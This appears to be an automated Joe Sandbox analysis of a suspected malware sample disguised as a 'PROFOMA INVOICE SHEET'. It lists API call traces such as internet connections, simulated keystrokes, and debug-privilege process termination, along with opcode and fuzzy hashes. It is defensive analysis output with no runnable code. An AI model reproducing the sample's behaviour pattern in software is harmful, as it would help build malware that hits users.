                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1290815626-3381328864
                                    • Opcode ID: c9bb1fc8aeb2ae450d0ccfebe2270a65c46cd71daebd3462eebadd9d2d0716a0
                                    • Instruction ID: 9af3211869f11752d23c779bdc48491fb589db933f8b9f74bf2bf76e7b4c6b8e
                                    • Opcode Fuzzy Hash: c9bb1fc8aeb2ae450d0ccfebe2270a65c46cd71daebd3462eebadd9d2d0716a0
                                    • Instruction Fuzzy Hash: CE11067668CB16BAFA036720EC06DE77B9CDB16324F22401AFB04E90D5EE61AC525624
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 1282221369-0
                                    • Opcode ID: b8c1e52b3d8ce872ca2c0874a7e3b4cd733113937fc22f1ab98d93f6d1c43a25
                                    • Instruction ID: f0a3d08ba14fc3f01ab8716383e282bf789240918d705b81003401d2182c20fc
                                    • Opcode Fuzzy Hash: b8c1e52b3d8ce872ca2c0874a7e3b4cd733113937fc22f1ab98d93f6d1c43a25
                                    • Instruction Fuzzy Hash: 0A613871905310AFDB27AFB4A8C1B6E7BAAEF05710F15416EF944BB291D7329D01C750
                                    APIs
                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00395186
                                    • ShowWindow.USER32(?,00000000), ref: 003951C7
                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 003951CD
                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003951D1
                                      • Part of subcall function 00396FBA: DeleteObject.GDI32(00000000), ref: 00396FE6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0039520D
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0039521A
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0039524D
                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00395287
                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00395296
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                    • String ID:
                                    • API String ID: 3210457359-0
                                    • Opcode ID: 0270bf7a46cc025498a74767b142952bcb7084f8518c048c473884daefa696ba
                                    • Instruction ID: c5f984ae4cad2f492e6b17cbc241d451bc4cc72a6fa932a69e70bf99a6535fc2
                                    • Opcode Fuzzy Hash: 0270bf7a46cc025498a74767b142952bcb7084f8518c048c473884daefa696ba
                                    • Instruction Fuzzy Hash: 7451C030A51A08BFEF279F24CC4ABD97B69FF05321F258412F6559A2E0C375A9C0DB40
                                    APIs
                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00356890
                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003568A9
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003568B9
                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003568D1
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003568F2
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00318874,00000000,00000000,00000000,000000FF,00000000), ref: 00356901
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0035691E
                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00318874,00000000,00000000,00000000,000000FF,00000000), ref: 0035692D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 1268354404-0
                                    • Opcode ID: 289a80960a9034c97f6a172967534bc220394bd02d29c6db05ce361d0bc5346c
                                    • Instruction ID: 6f2d4db759c7973f7af9e08f6a39b9fd0fef985f2f06795a38aab01d3ce24b71
                                    • Opcode Fuzzy Hash: 289a80960a9034c97f6a172967534bc220394bd02d29c6db05ce361d0bc5346c
                                    • Instruction Fuzzy Hash: FF51AC70600209EFDB26CF25CC52FAA7BB9FF48350F108519F906972A0DB71E994DB50
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0037C182
                                    • GetLastError.KERNEL32 ref: 0037C195
                                    • SetEvent.KERNEL32(?), ref: 0037C1A9
                                      • Part of subcall function 0037C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0037C272
                                      • Part of subcall function 0037C253: GetLastError.KERNEL32 ref: 0037C322
                                      • Part of subcall function 0037C253: SetEvent.KERNEL32(?), ref: 0037C336
                                      • Part of subcall function 0037C253: InternetCloseHandle.WININET(00000000), ref: 0037C341
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 337547030-0
                                    • Opcode ID: 41b5fcc9594cfec24c78905862825bb1645d5920b1e85418544db7621257893e
                                    • Instruction ID: 1e166b076ffcdc2847c1c4b1753d3ac51a2f24a087e473caadcd098b7297e64e
                                    • Opcode Fuzzy Hash: 41b5fcc9594cfec24c78905862825bb1645d5920b1e85418544db7621257893e
                                    • Instruction Fuzzy Hash: 1631A171120605AFDF329FA5DC44A66BBFCFF18300F04A82EF95A86611C739E810DB60
                                    APIs
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003625BD
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003625DB
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003625DF
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 003625E9
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00362601
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00362605
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0036260F
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00362623
                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00362627
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 4a48525477e77f9f0bbed7be137fcd00a8f9faf521abea347be0626afdce88f3
                                    • Instruction ID: 62ac54ea9d58e7dd5eed18682ad0b5b907098e34cc12818c0eca01b917bb2a25
                                    • Opcode Fuzzy Hash: 4a48525477e77f9f0bbed7be137fcd00a8f9faf521abea347be0626afdce88f3
                                    • Instruction Fuzzy Hash: B101D4303A0610BBFB216769DC8AF5A7F5DDF4EB52F105012F358AE0D5C9E22844DA6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00361449,?,?,00000000), ref: 0036180C
                                    • HeapAlloc.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 00361813
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00361449,?,?,00000000), ref: 00361828
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00361449,?,?,00000000), ref: 00361830
                                    • DuplicateHandle.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 00361833
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00361449,?,?,00000000), ref: 00361843
                                    • GetCurrentProcess.KERNEL32(00361449,00000000,?,00361449,?,?,00000000), ref: 0036184B
                                    • DuplicateHandle.KERNEL32(00000000,?,00361449,?,?,00000000), ref: 0036184E
                                    • CreateThread.KERNEL32(00000000,00000000,00361874,00000000,00000000,00000000), ref: 00361868
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
                                    • Opcode ID: 47ab6bae1bed7e186a48e081d746097e8ad5d7b3c9c868aae2bf8cf5f1491ff8
                                    • Instruction ID: e563ad1fbce61b2d57c504bdd80a1c3f4b73b7a74a5465acd95e260744ee9ad4
                                    • Opcode Fuzzy Hash: 47ab6bae1bed7e186a48e081d746097e8ad5d7b3c9c868aae2bf8cf5f1491ff8
                                    • Instruction Fuzzy Hash: 0C01BBB5250308BFE711ABA5DD4EF6B3BACEB89B11F409412FA05DB1A1CA759800CB34
                                    APIs
                                      • Part of subcall function 0036D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0036D501
                                      • Part of subcall function 0036D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0036D50F
                                      • Part of subcall function 0036D4DC: CloseHandle.KERNEL32(00000000), ref: 0036D5DC
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A16D
                                    • GetLastError.KERNEL32 ref: 0038A180
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038A1B3
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0038A268
                                    • GetLastError.KERNEL32(00000000), ref: 0038A273
                                    • CloseHandle.KERNEL32(00000000), ref: 0038A2C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: d1a65d83911a115e8cce5cf01428e077d3d9299dda14f0a24832e03c0da8f951
                                    • Instruction ID: 9ea4af31b824b0271ae9d7ea3350ccd00b64b2ca22c6e472cc779949bbb6283e
                                    • Opcode Fuzzy Hash: d1a65d83911a115e8cce5cf01428e077d3d9299dda14f0a24832e03c0da8f951
                                    • Instruction Fuzzy Hash: 0261AB702047029FE722EF18C494F16BBA5AF44318F19848DE4668FBA3C776EC45CB92
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00393925
                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0039393A
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00393954
                                    • _wcslen.LIBCMT ref: 00393999
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003939C6
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003939F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcslen
                                    • String ID: SysListView32
                                    • API String ID: 2147712094-78025650
                                    • Opcode ID: 60e73cf6ba86263d27a3eb0e36074a3e26ba2639cbf996779362bb246c7e8be0
                                    • Instruction ID: c9ec85cf8275e791b07eb4fe93f472fd6529f118b8975bd78bb240e55ffec600
                                    • Opcode Fuzzy Hash: 60e73cf6ba86263d27a3eb0e36074a3e26ba2639cbf996779362bb246c7e8be0
                                    • Instruction Fuzzy Hash: 77418571A00219ABEF22DF64CC45FEA7BA9FF08350F150526F958E7281D7719D94CB90
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0036BCFD
                                    • IsMenu.USER32(00000000), ref: 0036BD1D
                                    • CreatePopupMenu.USER32 ref: 0036BD53
                                    • GetMenuItemCount.USER32(01255F90), ref: 0036BDA4
                                    • InsertMenuItemW.USER32(01255F90,?,00000001,00000030), ref: 0036BDCC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                    • String ID: 0$2
                                    • API String ID: 93392585-3793063076
                                    • Opcode ID: 2397fe4d2313edb83e5a5dc2d5cd2f311d39c54163f155f0772ad0686a937585
                                    • Instruction ID: e70c46e8c6d8f6378a3866a7d3304cd6b6d52ff5966e49d1ff5afb7fea445a7f
                                    • Opcode Fuzzy Hash: 2397fe4d2313edb83e5a5dc2d5cd2f311d39c54163f155f0772ad0686a937585
                                    • Instruction Fuzzy Hash: 9A51AF70A002459BDF22CFA9D884BAEFBF8AF45314F14C21AE441DF299D7719981CF61
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00322D4B
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00322D53
                                    • _ValidateLocalCookies.LIBCMT ref: 00322DE1
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00322E0C
                                    • _ValidateLocalCookies.LIBCMT ref: 00322E61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: &H2$csm
                                    • API String ID: 1170836740-3052720543
                                    • Opcode ID: e133e1b8a99cc35434a4957b54c3f3ec7cab9aed90d35574ef783e1bd6a5f6d1
                                    • Instruction ID: 69b2824d4462084384f2d5d54761ae2da474ccbb20f6996a558e893723ada1bd
                                    • Opcode Fuzzy Hash: e133e1b8a99cc35434a4957b54c3f3ec7cab9aed90d35574ef783e1bd6a5f6d1
                                    • Instruction Fuzzy Hash: 0441C234E00228ABCF12DF68EC45AAFBBB5BF45324F158155E825AF352D735AA05CBD0
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 0036C913
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 5043a577de5c53d7566d82d48c8297e9a3bbc1845fcaf6b7ae03e3bc1ace6781
                                    • Instruction ID: 67ff7e259a117359c0049c53aea2e98919c4eb3cc1fa068445553a786540531c
                                    • Opcode Fuzzy Hash: 5043a577de5c53d7566d82d48c8297e9a3bbc1845fcaf6b7ae03e3bc1ace6781
                                    • Instruction Fuzzy Hash: 1C113A326A9306BAE7079B54AC83DFA37DCDF15354B20902FF544EA282E7B15E005364
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen$LocalTime
                                    • String ID:
                                    • API String ID: 952045576-0
                                    • Opcode ID: 9e78b3e2a438f9e147c566547e9a05091cb986e1d7926a4daca3da157c7f6e5c
                                    • Instruction ID: ff5c9f48feff151a7089bf2297276dd61ef7c08a799ceeca720b32a69c5df105
                                    • Opcode Fuzzy Hash: 9e78b3e2a438f9e147c566547e9a05091cb986e1d7926a4daca3da157c7f6e5c
                                    • Instruction Fuzzy Hash: AD416275C10228B5CB12EBF4988A9CFB7A8AF49710F508966E518E7122FB34E255C3E5
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0031F953
                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0035F3D1
                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0035682C,00000004,00000000,00000000), ref: 0035F454
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 6b6bc9c835bbab0065b16fa9b736a43a1421ad57264940b230ee5b94aa920061
                                    • Instruction ID: c26825fc130f1670f6d013741c5447931bd63f91a5b27ab48032390d59cd75fd
                                    • Opcode Fuzzy Hash: 6b6bc9c835bbab0065b16fa9b736a43a1421ad57264940b230ee5b94aa920061
                                    • Instruction Fuzzy Hash: 4F414E31208640BFD73FBB29C888BAA7B99AF4E325F59443DE44756970C73298C5CB11
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00392D1B
                                    • GetDC.USER32(00000000), ref: 00392D23
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00392D2E
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00392D3A
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00392D76
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00392D87
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00395A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00392DC2
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00392DE1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 2cab6ff87ef73144dd75ed8ce841ee1542656f2f9ae9de403a40d90f2df15913
                                    • Instruction ID: ca947b0d2818bd823989691ef8f2211809e173efabbd9bb206d219f877b17386
                                    • Opcode Fuzzy Hash: 2cab6ff87ef73144dd75ed8ce841ee1542656f2f9ae9de403a40d90f2df15913
                                    • Instruction Fuzzy Hash: 18316B72211614BFEF128F508C8AFEB3BADEB09715F084056FE089A291C6769C50CBA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: a263ebefddc88f80d8c131a27807ddb0b7e3b34f884cf6260ec55d4fcb69d253
                                    • Instruction ID: 5853d59d9b1c435b7e4a7d4b940276f9db2522e4b9343e1f5991f77ef23d34f8
